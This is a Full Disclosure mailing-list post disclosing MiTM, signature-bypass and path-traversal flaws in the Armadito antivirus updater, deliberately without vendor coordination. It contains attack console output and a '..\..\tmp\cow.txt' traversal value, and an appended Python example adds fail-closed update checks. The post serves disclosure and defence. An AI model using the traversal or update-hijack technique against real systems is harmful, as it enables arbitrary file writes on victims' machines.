Full Disclosure mailing list archives

Armadito remote arbitrary file write in case of MiTM


From: <thedeadcow () tutanota com>
Date: Mon, 27 Jun 2016 18:33:15 +0100 (BST)

Armadito (https://github.com/armadito) is a cross-platform open-source 
antivirus that was originally the DAVFI project, financed through a French 
government program.

As a security product supposed to protect computers against malware, its 
update system fails at multiple points:
* the public key used to check update packages is retrieved using plain HTTP. 
The same goes for the packages themselves.
* if Armadito can't download this public key, a bug makes it consider any 
file it checks as valid (you don't even need to forge a signature)
* a vulnerability as old as General de Gaulle (path traversal) then 
allows downloading a controlled URL to an arbitrary path

All this allows someone in control of DNS answers or more generally in a MiTM 
position to write arbitrary files when the update process is performed. It 
also allows the editor to do it if they want (but db.armadito.org does not 
seem to work at the time of writing this email). A simple python HTTP server 
is attached to this mail as a proof-of-concept.

This happens in the ArmaditoSvc tool using the "--updatedb" flag. The 
documentation doesn't specify if this should run as an administrator or not.

Here is an example of the output of this tool when a potential MiTM is 
performed:

===========
C:\tmp\armadito>type ..\cow.txt
File specified not found.

C:\tmp\armadito>ArmaditoSvc.exe --updatedb
---------------------------------
----- Armadito Scan service -----
---------------------------------
[+] Debug :: UpdateModulesDB :: description file downloaded successfully!
[+] Debug :: UpdateModulesDB :: signature file downloaded successfully!
armadito[4624]: <error> [-] Error :: download_pub_key :: 
URLDownloadToCacheFileA failed :: error = 0x800c0006

armadito[4624]: <error> [-] Error :: verify_file_signature :: Can't download 
public key from armadito server!

armadito[4624]: <error> [-] Error :: verify_file_signature :: Crypt Destroy 
Key failed! :: GLE = 0x57

[+] Debug :: UpdateModulesDB :: File Signature verified successfully !
[-] Error :: GetFileContent :: Opening the file failed! :: error = 3

[+] Debug :: DownloadPackageFiles :: Downloading file from :: 
http://127.0.0.1/cow....
[+] Debug :: DownloadPackageFiles :: cache filename = 
XX\AppData\Local\Microsoft\Windows\INetCache\IE\3YTFPC0U\cow[1].htm
[+] Debug :: ConvertBytesToChar :: string = 4dc9a4320e79db56894c037f27d5dc0a
[+] Debug :: DownloadPackageFiles :: checksum = 
4dc9a4320e79db56894c037f27d5dc0a
[-] Warning :: no notify handler! :: call a6o_notify_set_handler first
[+] Debug :: UpdateModulesDB :: Armadito service suspended successfully!

[+] Debug :: get_db_module_path :: completePath = 
C:\tmp\armadito\modules\DB\..\..\..\..\..\..\..\..\..\..\..\tmp\cow.txt
Conf_file = C:\tmp\armadito\conf\armadito.conf [+] Debug :: 
init_configuration :: conf file = C:\tmp\armadito\conf\armadito.conf
armadito[4624]: <warning> cannot open conf file 
C:\tmp\armadito\conf\armadito.conf
[+] Debug :: Configuration loaded successfully!
[+] Debug :: Armadito structure loaded successfully!
armadito[4624]: <error> [-] Error :: FilterConnectCommunicationPort() failed 
:: errcode = 0x80070002

armadito[4624]: <error> Scan Thread initialization failed!

armadito[4624]: <error> Service loaded with errors during pause.

[+] Debug :: UpdateModulesDB :: Armadito service resumed successfully!
armadito[4624]: <error> [-] Error :: SaveHashInCacheFile :: Creating the 
cache file failed! :: error = 3

[+] Debug :: UpdateModulesDB :: Modules Database updated successfully!
[-] Warning :: no notify handler! :: call a6o_notify_set_handler first

C:\tmp\armadito>type ..\cow.txt
put_your_dead_cow_here
==============

This is an irresponsible disclosure due to irresponsible spending of the 
French people's money.

The Dead Cow.

Attachment: serv.py

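The post describes three independent failures in the updater: the public key and the packages are fetched over plain HTTP, a failed key download is treated as a successful signature check, and the module path is joined without containment, so `..\..\` segments walk out of the DB directory. The following Python is an added example, not Armadito's code and not the attached serv.py; it shows what fail-closed versions of those three decisions look like side by side with a reconstruction of the fail-open check. The key bytes, the pinned fingerprint, the URLs, the module root and the injected `check` callable that stands in for the real asymmetric signature verification are all constructed for illustration.

```python
"""Fail-closed update verification with a pinned key and a contained write path.
Added example, not Armadito's code: HTTPS-only URLs, no update when the key is
missing or unexpected, and module paths that may not escape the DB directory.
"""
import hashlib
import hmac
import os
import posixpath
from dataclasses import dataclass
from typing import Callable, Optional
from urllib.parse import urlsplit

# Constructed key material; a real build embeds the fingerprint of its actual
# signing key, so a key fetched at runtime is only trusted if it matches the pin.
TRUSTED_KEY = b"-----BEGIN PUBLIC KEY-----\nconstructed-example-key\n-----END PUBLIC KEY-----\n"
PINNED_KEY_SHA256 = hashlib.sha256(TRUSTED_KEY).hexdigest()

# (key, data, signature) -> ok; stands in for the platform's signature API.
SignatureCheck = Callable[[bytes, bytes, bytes], bool]


class UpdateRejected(Exception):
    """Raised on any condition under which the update must not be applied."""


@dataclass(frozen=True)
class UpdateManifest:
    key_url: str
    package_url: str
    relative_path: str  # destination below the modules DB root


def fail_open_verify(key: Optional[bytes], data: bytes, sig: bytes, check: SignatureCheck) -> bool:
    """Reconstruction of the behaviour the post describes, kept for contrast:
    a missing key is reported as 'verified' without any signature being checked."""
    if key is None:
        return True  # the bug: the error path is treated as success
    return check(key, data, sig)


def require_https(url: str) -> str:
    """The post notes key and packages came over plain HTTP; insist on TLS."""
    parts = urlsplit(url)
    if parts.scheme != "https" or not parts.netloc:
        raise UpdateRejected(f"refusing non-HTTPS URL: {url}")
    return url


def load_trusted_key(fetched_key: Optional[bytes]) -> bytes:
    """Fail closed: no key, or a key that does not match the pin, means no update."""
    if fetched_key is None:
        raise UpdateRejected("public key unavailable; nothing can be verified")
    digest = hashlib.sha256(fetched_key).hexdigest()
    if not hmac.compare_digest(digest, PINNED_KEY_SHA256):
        raise UpdateRejected("fetched key does not match the pinned fingerprint")
    return fetched_key


def safe_module_path(db_root: str, relative_name: str) -> str:
    """Resolve relative_name under db_root and reject anything that escapes it.
    Backslashes are normalised so '..\\..\\tmp\\cow.txt' (the shape in the
    post's log) is rejected on every platform, not only on Windows."""
    root = os.path.abspath(db_root)
    normalized = relative_name.replace("\\", "/")
    segments = [s for s in normalized.split("/") if s]
    if not segments or posixpath.isabs(normalized) or ":" in segments[0]:
        raise UpdateRejected(f"unacceptable module path: {relative_name!r}")
    candidate = os.path.abspath(os.path.join(root, *segments))
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        raise UpdateRejected(f"module path escapes {root}: {relative_name!r}")
    return candidate


def verify_update(manifest: UpdateManifest, description: bytes, signature: bytes,
                  fetched_key: Optional[bytes], check: SignatureCheck, db_root: str) -> str:
    """Run every control in order; return the destination path only if all pass."""
    require_https(manifest.key_url)
    require_https(manifest.package_url)
    key = load_trusted_key(fetched_key)
    if not check(key, description, signature):
        raise UpdateRejected("description file signature does not verify")
    return safe_module_path(db_root, manifest.relative_path)


def is_rejected(fn, *args) -> bool:
    """True if fn(*args) raises UpdateRejected (used by demo() and the tests)."""
    try:
        fn(*args)
    except UpdateRejected:
        return True
    return False


def demo() -> str:
    """The scenario from the post's log: key download fails and the package
    names a path that climbs out of the DB directory."""
    manifest = UpdateManifest(
        key_url="http://db.example.invalid/pubkey.pem",  # constructed; plain HTTP as in the post
        package_url="http://127.0.0.1/cow",
        relative_path="..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\tmp\\cow.txt",
    )
    always_ok: SignatureCheck = lambda key, data, sig: True  # never consulted without a key
    try:
        verify_update(manifest, b"description", b"signature", None, always_ok,
                      r"C:\tmp\armadito\modules\DB")
    except UpdateRejected as err:
        return f"rejected: {err}"
    return "accepted"


if __name__ == "__main__":
    print(demo())
```

Each control rejects independently, so the update is refused at the first failing layer even when the others would have passed: `demo()` stops at the plain-HTTP key URL, and the same manifest with HTTPS URLs would still be refused for the absent key, and then again for the traversal path.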
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/